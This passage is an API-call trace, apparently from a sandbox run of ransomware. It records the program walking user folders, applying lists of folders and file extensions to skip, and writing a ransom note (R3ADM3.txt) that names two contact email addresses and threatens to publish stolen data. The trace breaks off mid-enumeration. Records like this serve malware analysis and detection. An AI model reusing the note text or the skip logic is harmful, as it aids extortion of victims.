cAlternateFileName="STARTM~1")) returned 1 [0141.339] lstrcmpW (lpString1="Start Menu", lpString2=".") returned 1 [0141.339] lstrcmpW (lpString1="Start Menu", lpString2="..") returned 1 [0141.339] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0141.339] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0141.339] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0141.339] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdb813c40, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdb813c40, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0141.339] lstrcmpW (lpString1="Videos", lpString2=".") returned 1 [0141.339] lstrcmpW (lpString1="Videos", lpString2="..") returned 1 [0141.339] StrStrIW (lpFirst="Videos", lpSrch="tmp") returned 0x0 [0141.340] StrStrIW (lpFirst="Videos", lpSrch="winnt") returned 0x0 [0141.340] StrStrIW (lpFirst="Videos", lpSrch="temp") returned 0x0 [0141.340] StrStrIW (lpFirst="Videos", lpSrch="thumb") returned 0x0 [0141.340] StrStrIW (lpFirst="Videos", lpSrch="$Recycle.Bin") returned 0x0 [0141.340] StrStrIW (lpFirst="Videos", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.340] StrStrIW (lpFirst="Videos", lpSrch="System Volume Information") returned 0x0 [0141.340] StrStrIW (lpFirst="Videos", lpSrch="Boot") returned 0x0 [0141.340] StrStrIW (lpFirst="Videos", lpSrch="Windows") returned 0x0 [0141.340] StrStrIW (lpFirst="Videos", lpSrch="Trend Micro") returned 0x0 [0141.340] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0141.340] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.340] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xeec3c0 [0141.340] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.340] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0141.340] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2c68 [0141.340] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3550 [0141.340] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec3c0 | out: hHeap=0xea0000) returned 1 [0141.340] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdb813c40, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdb813c40, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0141.340] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcd68 | out: hHeap=0xea0000) returned 1 [0141.340] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeac18 | out: hHeap=0xea0000) returned 1 [0141.340] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0141.341] Sleep (dwMilliseconds=0x32) [0141.447] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc8e8 | out: hHeap=0xea0000) returned 1 [0141.447] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc90 | out: hHeap=0xea0000) returned 1 [0141.447] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0141.447] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0141.447] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee40a8 [0141.447] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0141.447] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0141.447] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef27b8 [0141.447] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0141.447] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0141.447] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1d30 [0141.447] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4038 | out: hHeap=0xea0000) returned 1 [0141.447] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0141.447] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef27b8 | out: hHeap=0xea0000) returned 1 [0141.447] CreateFileW (lpFileName="C:\\Users\\Default\\R3ADM3.txt" (normalized: "c:\\users\\default\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c4 [0141.448] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0141.448] WriteFile (in: hFile=0x6c4, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0141.449] CloseHandle (hObject=0x6c4) returned 1 [0141.449] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec1d30 | out: hHeap=0xea0000) returned 1 [0141.449] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0141.449] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x597991b0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x597991b0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0141.450] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0141.450] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x597991b0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x597991b0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0141.450] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0141.450] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0141.450] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0141.450] lstrcmpW (lpString1="AppData", lpString2=".") returned 1 [0141.450] lstrcmpW (lpString1="AppData", lpString2="..") returned 1 [0141.450] StrStrIW (lpFirst="AppData", lpSrch="tmp") returned 0x0 [0141.450] StrStrIW (lpFirst="AppData", lpSrch="winnt") returned 0x0 [0141.450] StrStrIW (lpFirst="AppData", lpSrch="temp") returned 0x0 [0141.450] StrStrIW (lpFirst="AppData", lpSrch="thumb") returned 0x0 [0141.450] StrStrIW (lpFirst="AppData", lpSrch="$Recycle.Bin") returned 0x0 [0141.450] StrStrIW (lpFirst="AppData", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.450] StrStrIW (lpFirst="AppData", lpSrch="System Volume Information") returned 0x0 [0141.450] StrStrIW (lpFirst="AppData", lpSrch="Boot") returned 0x0 [0141.450] StrStrIW (lpFirst="AppData", lpSrch="Windows") returned 0x0 [0141.450] StrStrIW (lpFirst="AppData", lpSrch="Trend Micro") returned 0x0 [0141.450] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0141.450] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0141.450] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1d30 [0141.450] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0141.450] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0141.450] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef27b8 [0141.450] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc90 [0141.451] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec1d30 | out: hHeap=0xea0000) returned 1 [0141.451] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0141.451] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1 [0141.451] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1 [0141.451] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0141.451] lstrcmpW (lpString1="Contacts", lpString2=".") returned 1 [0141.451] lstrcmpW (lpString1="Contacts", lpString2="..") returned 1 [0141.451] StrStrIW (lpFirst="Contacts", lpSrch="tmp") returned 0x0 [0141.451] StrStrIW (lpFirst="Contacts", lpSrch="winnt") returned 0x0 [0141.451] StrStrIW (lpFirst="Contacts", lpSrch="temp") returned 0x0 [0141.451] StrStrIW (lpFirst="Contacts", lpSrch="thumb") returned 0x0 [0141.451] StrStrIW (lpFirst="Contacts", lpSrch="$Recycle.Bin") returned 0x0 [0141.451] StrStrIW (lpFirst="Contacts", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.451] StrStrIW (lpFirst="Contacts", lpSrch="System Volume Information") returned 0x0 [0141.451] StrStrIW (lpFirst="Contacts", lpSrch="Boot") returned 0x0 [0141.451] StrStrIW (lpFirst="Contacts", lpSrch="Windows") returned 0x0 [0141.451] StrStrIW (lpFirst="Contacts", lpSrch="Trend Micro") returned 0x0 [0141.451] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2718 [0141.451] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0141.451] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0141.451] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1d30 [0141.451] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0141.451] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0141.451] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2718 | out: hHeap=0xea0000) returned 1 [0141.451] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2718 [0141.451] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc8e8 [0141.451] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec1d30 | out: hHeap=0xea0000) returned 1 [0141.451] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0141.451] lstrcmpW (lpString1="Cookies", lpString2=".") returned 1 [0141.452] lstrcmpW (lpString1="Cookies", lpString2="..") returned 1 [0141.452] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0141.452] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0141.452] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0141.452] StrStrIW (lpFirst="Desktop", lpSrch="tmp") returned 0x0 [0141.452] StrStrIW (lpFirst="Desktop", lpSrch="winnt") returned 0x0 [0141.452] StrStrIW (lpFirst="Desktop", lpSrch="temp") returned 0x0 [0141.452] StrStrIW (lpFirst="Desktop", lpSrch="thumb") returned 0x0 [0141.452] StrStrIW (lpFirst="Desktop", lpSrch="$Recycle.Bin") returned 0x0 [0141.452] StrStrIW (lpFirst="Desktop", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.452] StrStrIW (lpFirst="Desktop", lpSrch="System Volume Information") returned 0x0 [0141.452] StrStrIW (lpFirst="Desktop", lpSrch="Boot") returned 0x0 [0141.452] StrStrIW (lpFirst="Desktop", lpSrch="Windows") returned 0x0 [0141.452] StrStrIW (lpFirst="Desktop", lpSrch="Trend Micro") returned 0x0 [0141.452] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0141.452] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0141.452] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1d30 [0141.452] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0141.452] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0141.452] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2790 [0141.452] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcd68 [0141.452] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec1d30 | out: hHeap=0xea0000) returned 1 [0141.452] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0141.452] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0141.452] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0141.452] StrStrIW (lpFirst="Documents", lpSrch="tmp") returned 0x0 [0141.452] StrStrIW (lpFirst="Documents", lpSrch="winnt") returned 0x0 [0141.452] StrStrIW (lpFirst="Documents", lpSrch="temp") returned 0x0 [0141.452] StrStrIW (lpFirst="Documents", lpSrch="thumb") returned 0x0 [0141.453] StrStrIW (lpFirst="Documents", lpSrch="$Recycle.Bin") returned 0x0 [0141.453] StrStrIW (lpFirst="Documents", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.453] StrStrIW (lpFirst="Documents", lpSrch="System Volume Information") returned 0x0 [0141.453] StrStrIW (lpFirst="Documents", lpSrch="Boot") returned 0x0 [0141.453] StrStrIW (lpFirst="Documents", lpSrch="Windows") returned 0x0 [0141.453] StrStrIW (lpFirst="Documents", lpSrch="Trend Micro") returned 0x0 [0141.453] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef27e0 [0141.453] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0141.453] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0141.453] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1d30 [0141.453] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0141.453] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0141.453] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef27e0 | out: hHeap=0xea0000) returned 1 [0141.453] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef27e0 [0141.453] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0141.453] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec1d30 | out: hHeap=0xea0000) returned 1 [0141.453] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0141.453] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1 [0141.453] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1 [0141.453] StrStrIW (lpFirst="Downloads", lpSrch="tmp") returned 0x0 [0141.453] StrStrIW (lpFirst="Downloads", lpSrch="winnt") returned 0x0 [0141.453] StrStrIW (lpFirst="Downloads", lpSrch="temp") returned 0x0 [0141.453] StrStrIW (lpFirst="Downloads", lpSrch="thumb") returned 0x0 [0141.453] StrStrIW (lpFirst="Downloads", lpSrch="$Recycle.Bin") returned 0x0 [0141.453] StrStrIW (lpFirst="Downloads", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.453] StrStrIW (lpFirst="Downloads", lpSrch="System Volume Information") returned 0x0 [0141.453] StrStrIW (lpFirst="Downloads", lpSrch="Boot") returned 0x0 [0141.453] StrStrIW (lpFirst="Downloads", lpSrch="Windows") returned 0x0 [0141.454] StrStrIW (lpFirst="Downloads", lpSrch="Trend Micro") returned 0x0 [0141.454] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2768 [0141.454] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0141.454] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0141.454] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1d30 [0141.454] StrStrIW (lpFirst="Favorites", lpSrch="tmp") returned 0x0 [0141.454] StrStrIW (lpFirst="Favorites", lpSrch="winnt") returned 0x0 [0141.454] StrStrIW (lpFirst="Favorites", lpSrch="temp") returned 0x0 [0141.454] StrStrIW (lpFirst="Favorites", lpSrch="thumb") returned 0x0 [0141.454] StrStrIW (lpFirst="Favorites", lpSrch="$Recycle.Bin") returned 0x0 [0141.454] StrStrIW (lpFirst="Favorites", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.454] StrStrIW (lpFirst="Favorites", lpSrch="System Volume Information") returned 0x0 [0141.454] StrStrIW (lpFirst="Favorites", lpSrch="Boot") returned 0x0 [0141.454] StrStrIW (lpFirst="Favorites", lpSrch="Windows") returned 0x0 [0141.454] StrStrIW (lpFirst="Favorites", lpSrch="Trend Micro") returned 0x0 [0141.454] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2678 [0141.454] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0141.454] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0141.454] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1d30 [0141.454] StrStrIW (lpFirst="Links", lpSrch="tmp") returned 0x0 [0141.454] StrStrIW (lpFirst="Links", lpSrch="winnt") returned 0x0 [0141.454] StrStrIW (lpFirst="Links", lpSrch="temp") returned 0x0 [0141.455] StrStrIW (lpFirst="Links", lpSrch="thumb") returned 0x0 [0141.455] StrStrIW (lpFirst="Links", lpSrch="$Recycle.Bin") returned 0x0 [0141.455] StrStrIW (lpFirst="Links", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.455] StrStrIW (lpFirst="Links", lpSrch="System Volume Information") returned 0x0 [0141.455] StrStrIW (lpFirst="Links", lpSrch="Boot") returned 0x0 [0141.455] StrStrIW (lpFirst="Links", lpSrch="Windows") returned 0x0 [0141.455] StrStrIW (lpFirst="Links", lpSrch="Trend Micro") returned 0x0 [0141.455] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0141.455] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0141.455] StrStrIW (lpFirst="Music", lpSrch="tmp") returned 0x0 [0141.455] StrStrIW (lpFirst="Music", lpSrch="winnt") returned 0x0 [0141.455] StrStrIW (lpFirst="Music", lpSrch="temp") returned 0x0 [0141.455] StrStrIW (lpFirst="Music", lpSrch="thumb") returned 0x0 [0141.455] StrStrIW (lpFirst="Music", lpSrch="$Recycle.Bin") returned 0x0 [0141.455] StrStrIW (lpFirst="Music", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.455] StrStrIW (lpFirst="Music", lpSrch="System Volume Information") returned 0x0 [0141.455] StrStrIW (lpFirst="Music", lpSrch="Boot") returned 0x0 [0141.455] StrStrIW (lpFirst="Music", lpSrch="Windows") returned 0x0 [0141.455] StrStrIW (lpFirst="Music", lpSrch="Trend Micro") returned 0x0 [0141.455] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0141.455] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0141.455] StrStrIW (lpFirst="NTUSER.DAT", lpSrch=".UAKXC") returned 0x0 [0141.455] StrStrIW (lpFirst="NTUSER.DAT", lpSrch=".exe") returned 0x0 [0141.455] StrStrIW (lpFirst="NTUSER.DAT", lpSrch=".dll") returned 0x0 [0141.455] StrStrIW (lpFirst="NTUSER.DAT", lpSrch=".lnk") returned 0x0 [0141.455] StrStrIW (lpFirst="NTUSER.DAT", lpSrch=".sys") returned 0x0 [0141.455] StrStrIW (lpFirst="NTUSER.DAT", lpSrch=".msi") returned 0x0 [0141.456] StrStrIW (lpFirst="NTUSER.DAT", lpSrch="R3ADM3.txt") returned 0x0 [0141.456] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2ce0 [0141.456] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0141.456] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3fc8 [0141.456] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1d30 [0141.456] StrStrIW (lpFirst="NTUSER.DAT.LOG", lpSrch=".UAKXC") returned 0x0 [0141.456] StrStrIW (lpFirst="NTUSER.DAT.LOG", lpSrch=".exe") returned 0x0 [0141.456] StrStrIW (lpFirst="NTUSER.DAT.LOG", lpSrch=".dll") returned 0x0 [0141.456] StrStrIW (lpFirst="NTUSER.DAT.LOG", lpSrch=".lnk") returned 0x0 [0141.456] StrStrIW (lpFirst="NTUSER.DAT.LOG", lpSrch=".sys") returned 0x0 [0141.456] StrStrIW (lpFirst="NTUSER.DAT.LOG", lpSrch=".msi") returned 0x0 [0141.456] StrStrIW (lpFirst="NTUSER.DAT.LOG", lpSrch="R3ADM3.txt") returned 0x0 [0141.456] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2d08 [0141.456] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0141.456] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3fc8 [0141.456] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1d30 [0141.456] StrStrIW (lpFirst="NTUSER.DAT.LOG1", lpSrch=".UAKXC") returned 0x0 [0141.456] StrStrIW (lpFirst="NTUSER.DAT.LOG1", lpSrch=".exe") returned 0x0 [0141.456] StrStrIW (lpFirst="NTUSER.DAT.LOG1", lpSrch=".dll") returned 0x0 [0141.456] StrStrIW (lpFirst="NTUSER.DAT.LOG1", lpSrch=".lnk") returned 0x0 [0141.456] StrStrIW (lpFirst="NTUSER.DAT.LOG1", lpSrch=".sys") returned 0x0 [0141.456] StrStrIW (lpFirst="NTUSER.DAT.LOG1", lpSrch=".msi") returned 0x0 [0141.456] StrStrIW (lpFirst="NTUSER.DAT.LOG1", lpSrch="R3ADM3.txt") returned 0x0 [0141.456] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2d30 [0141.456] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0141.456] RtlAllocateHeap (HeapHandle=0xea0000, 